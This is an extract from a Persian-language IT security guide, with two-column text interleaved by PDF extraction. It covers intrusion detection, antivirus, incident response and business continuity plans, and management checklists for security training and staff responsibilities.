‫ﻝ ﺍﺟﺮﺍﻱ ﺻـﺤﻴﺢ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ‬ ‫ﺑﺮﻧﺎﻣﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺑﻪ ﻛﻨﺘﺮ ﹺ‬
‫ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺗـﺪﻭﻳﻦ‬ ‫ﻏﺮﺑﺎﻝ ﻛﺮﺩﻥ ﻣﺤﺘﻮﺍ ﺑﺼﻮﺭﺕ ﻓﻌـﺎﻝ ‪ -‬ﺩﺭ ﺳـﻄﺢ‬ ‫‪.۵‬‬
‫ﺷﺪﻩﺍﻧﺪ ﺑﭙﺮﺩﺍﺯﺩ‪.‬‬ ‫ﻣﺮﻭﺭﮔﺮﻫـﺎﻱ ﻭﺏ‪ ،‬ﻻﺯﻡ ﺍﺳــﺖ ﻫـﺮ ﺁﻧﭽــﻪ ﻛـﻪ ﻣﻨﺎﺳــﺐ‬
‫ﻣﺤﻴﻂ ﻛﺎﺭ ﻧﻴﺴﺖ ﻳﺎ ﺑﺎ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﺼﻮﺏ ﻣﻐـﺎﻳﺮ ﺍﺳـﺖ‬
‫‪ .۱۲‬ﻃﺮﺡ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩ )‪ ١٨٥(IRP‬ﻭ ﺗـﺪﺍﻭﻡ‬
‫ﺗﺼﻔﻴﻪ ﺷﻮﺩ‪.‬‬
‫ﮐﺴﺐ ﻭ ﮐﺎﺭ )‪ - ١٨٦(BCP‬ﺍﻳـﻦ ﺳـﻨﺪ ﺍﺻـﻠﻲﺗـﺮﻳﻦ‬
‫ﺳﻨﺪﻱ ﺍﺳﺖ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﺁﻥ ﻣﻲﮔﻮﻳـﺪ ﭼﮕﻮﻧـﻪ ﻳـﻚ‬ ‫ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳـﺎﺏ )‪ - (IDS‬ﺍﻳـﻦ ﻳـﻚ ﺳﻴـﺴﺘﻢ‬ ‫‪.۶‬‬
‫ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﻛﻨﺪ‪ ،‬ﺑﻪ ﺁﻥ ﻭﺍﻛﻨﺶ ﻧﺸﺎﻥ‬ ‫ﻣﺨﺘﺺ ﺷﻨﺎﺳـﺎﻳﻲ ﻧﻔﻮﺫﻫـﺎ ﻳـﺎ ﺗﻼﺷـﻬﺎﻱ ﻧﻔـﻮﺫ ﺍﺳـﺖ‪،‬‬
‫ﻣﻲﺩﻫﺪ‪ ،‬ﻭ ﺁﺳﻴﺒﻬﺎﻱ ﺁﻧﺮﺍ ﺗﺮﻣﻴﻢ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺩﺍﺷـﺘﻦ ﻳـﻚ‬ ‫ﻧﻔﻮﺫﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﻭ ﻳﺎ ﺑﺎ ﻛﻤﻚ‬
‫‪ IRP‬ﻭ ﺁﺯﻣــﺎﻳﺶ ﺩﻭﺭﻩﺍﻱ ﺁﻥ ﻳﻜــﻲ ﺍﺯ ﺍﺻــﻠﻲﺗــﺮﻳﻦ‬ ‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﺒﺮﺓ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ‪ .‬ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ‬
‫ﺣﺮﺑﻪﻫﺎﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺍﺳﺖ‪.‬‬ ‫ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ‪ ١٨٤‬ﻭ ﺳـﺎﻳﺮ ﺍﻃﻼﻋـﺎﺕ ﺷـﺒﻜﻪ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲ ﻛﻨﺪ‪ .‬ﺭﻭﺷﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺑﺴﺘﻪ ﺑﻪ ﻋﻮﺍﻣﻠﻲ ﭼـﻮﻥ ﺍﻧـﻮﺍﻉ‬
‫‪١٨٧‬‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺟﺮﺍﻳﻲ‬ ‫ﺣﻤﻼﺗﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﻧﻬﺎ ﺩﻓﺎﻉ ﻛﻨﺪ‪،‬‬
‫ﻣﺒﺎﺩﻱ ﻧﻔﻮﺫ‪ ،‬ﺍﻧﻮﺍﻉ ﺩﺍﺭﺍﺋﻴﻬﺎ‪ ،‬ﻭ ﻣﻴـﺰﺍﻥ ﻧﮕﺮﺍﻧـﻲ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﻗﺒﻞ ﺩﻳﺪﻳﻢ ﺁﮔﺎﻫﻲ ﺍﺯ ﻧﻜـﺎﺕ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻫﺮﻳﻚ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎ‪ ،‬ﺑﺴﻴﺎﺭ ﻣﺘﻨﻮﻉ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻣﺤﻴﻄﻲ ﻛﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺩﺭ ﺁﻥ ﺑﻪ ﻧﺤﻮ ﺍﺣﺴﻦ ﻗﺎﺩﺭ ﺑﻪ‬
‫ﻫﻤﻜﺎﺭﻱ ﺟﻬﺖ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺳـﺎﺯﻣﺎﻥ ﺧـﻮﺩ ﺑﺎﺷـﻨﺪ ﻳـﻚ ﻧﻜﺘـﺔ‬ ‫ﻭﻳﺮﻭﺱﻳﺎﺑﻬـﺎ ‪ -‬ﻛﺮﻣﻬـﺎ‪ ،‬ﺗﺮﺍﻭﺍﻫـﺎ ﻭ ﻭﻳﺮﻭﺳـﻬﺎ ﻫﻤـﻪ‬ ‫‪.۷‬‬
‫ﻛﻠﻴﺪﻱ ﺍﺳﺖ‪ .‬ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺍﺯ ﻧﺤـﻮﺓ ﺑﺮﺧـﻮﺭﺩ ﻣـﺪﻳﺮﺍﻥ ﺑـﺎ ﻗﻮﺍﻋـﺪ‬ ‫ﺍﺑﺰﺍﺭﻫــﺎﻳﻲ ﺑــﺮﺍﻱ ﺍﻧﺠــﺎﻡ ﺣﻤــﻼﺕ ﻫــﺴﺘﻨﺪ‪ .‬ﻭﻳــﺮﻭﺱ‬
‫ﺍﻣﻨﻴﺘــﻲ ﻭ ﻣﻴــﺰﺍﻥ ﺳــﺮﻣﺎﻳﻪﮔــﺬﺍﺭﻱ ﺁﻧﻬــﺎ ﺩﺭ ﺣــﻮﺯﺓ ﺁﻣــﻮﺯﺵ ﻭ‬ ‫ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺁﻟﻮﺩﻩ ﻛﺮﺩﻥ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻣﻨﻴﺖ ﻭ ﺳﺎﻳﺮ ﺯﻣﻴﻨﻪﻫﺎﻱ ﻣﺮﺑﻮﻃﻪ‪ ،‬ﺗﺄﺛﻴﺮ ﻣـﻲ ﭘﺬﻳﺮﻧـﺪ‪.‬‬ ‫ﺳﻴﺴﺘﻢ‪ ،‬ﺧﻮﺩ ﺭﺍ ﺗﻮﺯﻳﻊ ﻛﻨﺪ‪ .‬ﺗﺮﺍﻭﺍﻫﺎ ﺧﻮﺩ ﺭﺍ ﺗﻮﺯﻳﻊ ﻳـﺎ ﺑـﻪ‬
‫ﺳﺎﻳﺮ ﻓﺎﻳﻠﻬﺎ ﻣﺘﺼﻞ ﻧﻤﻲﻛﻨﻨﺪ‪ .‬ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﻣﺨﺮﺏ ﻭ ﺁﺳﻴﺐﺭﺳﺎﻥ ﺭﺍ ﻣﻲﻳﺎﺑﻨﺪ ﻭ ﺍﺯ ﻛﺎﺭ ﻣﻲﺍﻧﺪﺍﺯﻧﺪ‪.‬‬
‫‪185 Incident Response Plan‬‬
‫‪186 Business Continuity Plan‬‬
‫‪ ۱۸۷‬ﻣﻨﺒﻊ‪ ،ITS :‬ﻓﺼﻞ ﺳﻮﻡ‪ ،‬ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺟﺮﺍﻳﻲ‪ ،‬ﺹ ‪۵۰‬‬ ‫‪184 Log Files‬‬
‫‪١٩٩‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ‬ ‫ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺑﺮﺍﻱ ﻣﺴﺌﻮﻟﻴﻦ ﺍﺟﺮﺍﻳﻲ ﺷﺮﻛﺖ ﻛﻪ ﺍﺟـﺮﺍﻱ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺭﻫﺒﺮﻱ ﻣﻲﻛﻨﻨﺪ ﺗﻨﻈﻴﻢ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﻤﻨﻈﻮﺭ ﺗﺮﻭﻳﺞ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﻣﺪﻳﺮﺍﻥ ﺑﺎﻳﺪ‪:‬‬
‫ﺁﻳﺎ ﺧﻼﺻﻪ ﻫﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺗﻬﻴﻪ ﻣـﻲﺷـﻮﻧﺪ؟‬ ‫•‬
‫ﺗﻮﺿﻴﺢ ﺩﻫﻨﺪ ﻛﻪ ﻋﻨﺎﺻﺮ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺘﻲ ﺧـﻮﺏ ﭼـﻪ‬ ‫•‬
‫ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟‬
‫ﭼﻴﺰﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺁﻳﺎ ﺍﺯ ﺳﻄﻮﺡ ﺑﺎﻻﻱ ﻣﺪﻳﺮﻳﺖ ﺗﺎ ﻛﺎﺭﻛﻨﺎﻥ ﺧﻂ ﺗﻮﻟﻴﺪ ﻳـﻚ‬ ‫•‬
‫ﺗﺄﻛﻴﺪ ﻛﻨﻨﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺩﺭ ﺗﻤﺎﻡ ﺳـﻄﻮﺡ ﺳـﺎﺯﻣﺎﻥ ﺑـﺴﻴﺎﺭ‬ ‫•‬
‫ﻣﺴﻴﺮ ﺍﺭﺗﺒﺎﻃﻲ ﻣﺸﺨﺺ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫ﻣﻬﻢ ﺍﺳﺖ‪.‬‬
‫ﺁﻳﺎ ﻫﻤﻪ ﻣـﻲﺩﺍﻧﻨـﺪ ﻛـﻪ ﺁﻥ ﻣـﺴﻴﺮ ﺍﺭﺗﺒـﺎﻃﻲ ﭼﻴـﺴﺖ ﻭ‬ ‫•‬
‫ﺍﻓﺮﺍﺩ ﺭﺍ ﻧﺴﺒﺖ ﺑﻪ ﭘﺮﺳﻴﺪﻥ ﺳـﺆﺍﻝ ﺩﺭ ﺯﻣﻴﻨـﺔ ﻓﻨﺎﻭﺭﻳﻬـﺎ ﻭ‬ ‫•‬
‫ﻛﺠﺎﺳﺖ؟‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺗﺮﻏﻴﺐ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺁﻳﺎ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴﺖ ﺻﺮﺍﺣﺘﹰﺎ ﺑﺮ ﻋﻬﺪﺓ ﻳﻜـﻲ ﺍﺯ ﻣـﺪﻳﺮﺍﻥ‪،‬‬ ‫•‬
‫ﺍﺯ ﻛﻠﻴﺔ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺨﻮﺍﻫﻨﺪ ﺩﺭ ﺍﻳﻦ ﺭﺍﺑﻄﻪ ﺑـﺴﻴﺎﺭ ﻫﻮﺷـﻴﺎﺭ‬ ‫•‬
‫ﻼ ﻗﺎﺋﻢ ﻣﻘﺎﻡ ﻣﺪﻳﺮ ﻋﺎﻣﻞ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﻳﺎ ﻣﺪﻳﺮ ﺍﻣﻨﻴـﺖ‪ ،‬ﻳـﺎ‬
‫ﻣﺜ ﹰ‬
‫ﺑﺎﺷﻨﺪ ﻭ ﻫﺮﮔﻮﻧﻪ ﻓﻌﺎﻟﻴﺖ ﻏﻴﺮﻣﻌﻤﻮﻝ )ﺩﺭ ﻣﺤـﻴﻂ ﺍﺩﺍﺭﻩ ﻳـﺎ ﺩﺭ‬
‫ﻳﻜﻲ ﺩﻳﮕﺮ ﺍﺯ ﻣﺪﻳﺮﺍﻥ ﺳﺎﺯﻣﺎﻥ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؟‬
‫ﺳﻄﺢ ﺷﺒﻜﻪ( ﺭﺍ ﮔﺰﺍﺭﺵ ﺩﻫﻨﺪ‪.‬‬
‫ﺁﻳﺎ ﻣﺪﻳﺮﻳﺖ ﺑﺎ ﺍﺭﺍﺋﻪ ﻭ ﺍﻋﻤـﺎﻝ ﺑﺮﻧﺎﻣـﺔ ﺍﻣﻨﻴﺘـﻲ ﺳـﺎﺯﻣﺎﻥ‪،‬‬ ‫•‬
‫•‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻣﺸﺨﺺ ﻛﻨﻨﺪ ﻛﻪ ﭼﻪ ﻛﺎﺭﻫﺎﻳﻲ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ‬


‫ﺗﻌﻬﺪ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﻥ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺍﺳﺖ؟‬
‫ﺧﺼﻮﺻﻲ ﻭ ﺍﻳﻤﻨﻲ ﻛﺎﺭﻛﻨﺎﻥ ﺻﻮﺭﺕ ﻣﻲ ﮔﻴـﺮﺩ‪ ،‬ﻭ ﺑـﺮﺍﻱ‬
‫ﻫﻤﻪ ﺭﻭﺷﻦ ﻧﻤﺎﻳﻨﺪ ﻛﻪ ﻭﻓـﺎﺩﺍﺭﻱ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﺩﺭ ﺩﺭﺟـﺔ‬ ‫ﺁﻳﺎ ﺭﻭﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻨﺎﺳﺐ ﺍﻧﺠﺎﻡ‬ ‫•‬

‫ﺍﻭﻝ ﻗــﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﻧﻔﻮﺫﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﻋﻤــﺪﻱ ﻗﺎﺑــﻞ‬ ‫ﺷﺪﻩ ﻭ ﺑﻮﺩﺟﺔ ﻣﺮﺑﻮﻃـﻪ ﻭﺍﻗﻌـﹰﺎ ﺑـﻪ ﺁﻥ ﺗﺨـﺼﻴﺺ ﻳﺎﻓﺘـﻪ‬
‫ﭼﺸﻢﭘﻮﺷﻲ ﻧﻤﻲﺑﺎﺷﻨﺪ‪.‬‬ ‫ﺍﺳﺖ؟‬

‫ﻓﻬﺮﺳﺖ ﺯﻳﺮ ﺑﺎ ﻫﺪﻑ ﻛﻤﻚ ﺑﻪ ﻣﺪﻳﺮﺍﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺗﺎ ﺑﺘﻮﺍﻧﻨـﺪ‬ ‫ﺁﻳﺎ ﻫﻤﺔ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺍﻫﻤﻴﺖ ﮔﺰﺍﺭﺵ ﻭ‬ ‫•‬

‫ﻛﺎﺭﻛﻨﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺳـﺎﺯﻣﺎﻥ ﺁﻣـﻮﺯﺵ‬ ‫ﺣﻞ ﺳﺮﻳﻊ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭﻙ ﻣﻲﻛﻨﻨﺪ؟‬
‫ﺩﻫﻨﺪ‪:‬‬ ‫ﺁﻳﺎ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺁﮔﺎﻫﻴﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﻌﻨـﻮﺍﻥ ﺑﺨـﺸﻲ ﺍﺯ‬ ‫•‬

‫‪١٨٨‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺟﺪﻳﺪ ﻫﻤـﺔ ﺳـﻄﻮﺡ‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺁﻣﻮﺯﺷﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‬ ‫‪ -‬ﺍﺯ ﻛﺎﺭﻛﻨــﺎﻥ ﺧــﻂ ﺗﻮﻟﻴــﺪ ﮔﺮﻓﺘــﻪ ﺗــﺎ ﺳــﻄﻮﺡ ﺑــﺎﻻﻱ‬
‫ﺁﻳﺎ ﻫﻤﺔ ﻣﺪﻳﺮﺍﻥ ﺭﺩﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﻪ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴـﺖ‬ ‫•‬ ‫ﻣﺪﻳﺮﻳﺘﻲ ‪ -‬ﭘﺬﻳﺮﻓﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؟‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﻣﺘﻌﻬﺪ ﻫﺴﺘﻨﺪ؟‬ ‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺁﮔﺎﻫﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺗﻤﺎﻡ ﺭﺩﻩﻫﺎ ﻧﺴﺒﺖ‬ ‫•‬
‫ﺁﻳﺎ ﺑﺎ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺟﻬﺖ ﺁﻣﻮﺯﺷـﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﺍﺯ ﺍﻳـﻦ‬ ‫•‬ ‫ﺑﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷـﺮﻛﺖ ﮔﺎﻣﻬـﺎﻱ‬
‫ﺗﻌﻬﺪ ﺣﻤﺎﻳﺖ ﻛﺮﺩﻩﺍﻧﺪ؟‬ ‫ﻻﺯﻡ ﺑﺮﺩﺍﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؟‬
‫ﺁﻳﺎ ﺁﻥ ﺑﺮﻧﺎﻣـﺔ ﺁﻣﻮﺯﺷـﻲ ﺷـﺎﻣﻞ ﺟﺰﺋﻴـﺎﺕ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻭ‬ ‫•‬ ‫ﺁﻳــﺎ ﻫﻨﮕــﺎﻡ ﺗــﺪﻭﻳﻦ ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﺑــﻪ‬ ‫•‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻣﻨﻴﺖ ﻧﻴﺰ ﻣﻲﺑﺎﺷﺪ؟‬ ‫ﻭﺍﻗﻌﻴﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﺮﻫﻨﮓ ﺷـﺮﻛﺖ )ﺭﻭﺍﺑـﻂ ﻣـﺪﻳﺮﺍﻥ ﻭ‬
‫ﻛﺎﺭﻣﻨﺪﺍﻥ( ﺗﻮﺟﻪ ﺷﺪﻩ ﺍﺳﺖ؟‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺁﻣﻮﺯﺵ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺗﻌﻴﻴﻦﺷﺪﻩﺍﻱ ﻭﺟﻮﺩ‬ ‫•‬
‫ﺩﺍﺭﺩ؟‬ ‫ﺁﻳﺎ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻣﻲﺩﺍﻧﻨﺪ ﻛﻪ ﻫﻨﮕﺎﻡ ﺑﺮﺧـﻮﺭﺩ ﺑـﺎ ﻣـﺸﻜﻼﺕ‬ ‫•‬
‫ﺍﻣﻨﻴﺘﻲ )ﻳﺎ ﺩﺭ ﺟﺎﻳﻲ ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﻭﻇﺎﻳﻒ ﺧﻮﺩ ﺁﮔﺎﻩ ﻧﻴﺴﺘﻨﺪ( ﺑﺎﻳﺪ‬
‫ﺁﻳﺎ ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻛﺎﻣﻞ ﻭ ﺑﻪﺭﻭﺯ ﻫﺴﺘﻨﺪ ﻭ ﺁﻳﺎ ﻛﺎﺭﻛﻨـﺎﻥ ﺍﺯ‬ ‫•‬
‫ﺍﺯ ﭼﻪ ﻛﺴﻲ ﻛﻤﻚ ﺑﺨﻮﺍﻫﻨﺪ؟‬
‫ﺁﻧﻬﺎ ﺍﻃﻼﻉ ﺩﺍﺭﻧﺪ؟‬
‫ﺁﻳﺎ ﺑﺎﺯﺑﻴﻨﻲ ﻭ ﻣﻤﻴﺰﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ؟‬ ‫•‬
‫ﻫﺮ ﺷﺶ ﻣﺎﻩ ﻳﻜﺒﺎﺭ؟ ﻫﺮ ﺳﺎﻝ ﻳﻜﺒﺎﺭ؟‬
‫‪ ۱۸۸‬ﻣﻨﺒﻊ‪ ،ITS :‬ﻓﺼﻞ ﭘﻨﺠﻢ‪ ،‬ﺁﻣﻮﺯﺵ ﺍﻣﻨﻴﺖ‪ ،‬ﺹ ‪۸۱‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٠٠‬‬

‫‪١٩٠‬‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺯﻳﺎﻥ‬ ‫ﺁﻳــﺎ ﻫﻤــﺔ ﻛﺎﺭﻣﻨــﺪﺍﻥ )ﺍﺯ ﺟﻤﻠــﻪ ﻣــﺪﻳﺮﺍﻥ ﺍﺟﺮﺍﻳــﻲ( ﺩﺭﺑــﺎﺭﺓ‬ ‫•‬
‫ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺩﺭ ﻗﺒـﺎﻝ ﺷـﺮﻛﺖ ﺁﻣـﻮﺯﺵ‬
‫ﺁﻳﺎ ﺑﻪ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺗﻼﺵ ﺑﺮﺍﻱ ﺣﻔﻆ ﺁﻥ ﻫﺴﺘﻴﺪ ﻭﺍﻗﻔﻴﺪ؟‬ ‫•‬
‫ﺩﻳﺪﻩﺍﻧﺪ؟‬
‫ﺁﻳﺎ ﻣﺪﻳﺮﻳﺖ ﻧﻴﺰ ﺩﺭ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﺩﺧﻴﻞ ﺑﻮﺩﻩ ﺍﺳﺖ؟‬ ‫•‬
‫ﺁﻳﺎ ﭼﺎﺭﭼﻮﺑﻲ ﺑﺮﺍﻱ ﺗﻮﺳﻌﻪ ﻭ ﺗﺪﺍﻭﻡ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘﻲ ﻭﺟـﻮﺩ‬ ‫•‬
‫ﺁﻳﺎ ﺳﻴﺎﺳﺘﻬﺎ ﺑﻪ ﻧﺜﺮ ﺭﻭﺍﻥ ﻧﻮﺷﺘﻪ ﺷﺪﻩﺍﻧﺪ ﻭ ﺑﺮﺍﺣﺘـﻲ ﻗﺎﺑـﻞ‬ ‫•‬ ‫ﺩﺍﺭﺩ؟‬
‫ﺩﺭﻙ ﻫﺴﺘﻨﺪ؟‬
‫ﺁﻳﺎ ﻫﻤﺔ ﺍﻓـﺮﺍﺩ ﺑـﻪ ﻳـﻚ ﻧـﺴﺨﻪ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ﺩﺳﺘﺮﺳـﻲ‬ ‫•‬ ‫ﭼﺎﺭﭼﻮﺏ ﻛﻨﺘﺮﻝ ﻭ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ‬
‫ﺩﺍﺭﻧﺪ؟‬ ‫ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﺩﻭﻡ‪ ،‬ﺳﻮﻡ‪ ،‬ﻭ ﭼﻬﺎﺭﻡ‪ ،‬ﺗﻬﺪﻳـﺪﻫﺎﻱ ﺭﺍﻳـﺞ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ‬
‫ﺁﻳﺎ ﻛﺴﻲ ﺷﺨﺼﹰﺎ ﺩﺭ ﺯﻣﻴﻨﺔ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎ ﻣـﺴﺌﻮﻟﻴﺖ‬ ‫•‬ ‫ﺑﺮﺭﺳﻲ ﻛﺮﺩﻳﻢ )ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ( ﻭ ﺭﻭﺷﻬﺎﻱ ﺗﺤﻠﻴـﻞ ﺧـﺴﺎﺭﺗﻬﺎ ﺭﺍ‬
‫ﺻﺮﻳﺢ ﺩﺍﺭﺩ؟‬ ‫ﺷﺮﺡ ﺩﺍﺩﻳﻢ‪ ،‬ﻭ ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﺑﻌﺪﻱ ﻧﻴﺰ ﺑﻪ ﺍﺭﺍﺋﻪ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ‬
‫ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ‪ -‬ﻛﻪ ﺑﻪ ﺗﻘﻮﻳﺖ ﺳـﺎﺯﻣﺎﻥ ﺩﺭ‬
‫ﺁﻳﺎ ﻛﺴﻲ ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺳﻴﺎﺳـﺘﻬﺎ ﺑـﺮ ﻋﻬـﺪﺓ ﺍﻭﺳـﺖ ﺩﺭ‬ ‫•‬
‫ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ ﻭ ﺧﺴﺎﺭﺍﺕ ﺍﺗﻔﺎﻗﻲ ﻣﻨﺠﺮ ﻣﻲﺷﻮﻧﺪ ‪ -‬ﭘـﺮﺩﺍﺧﺘﻴﻢ‪.‬‬
‫ﻛﻨﻔﺮﺍﻧﺴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺷﺮﻛﺖ ﻣـﻲﻛﻨـﺪ ﻭ ﺩﺍﻧـﺶ ﺍﻣﻨﻴﺘـﻲ‬
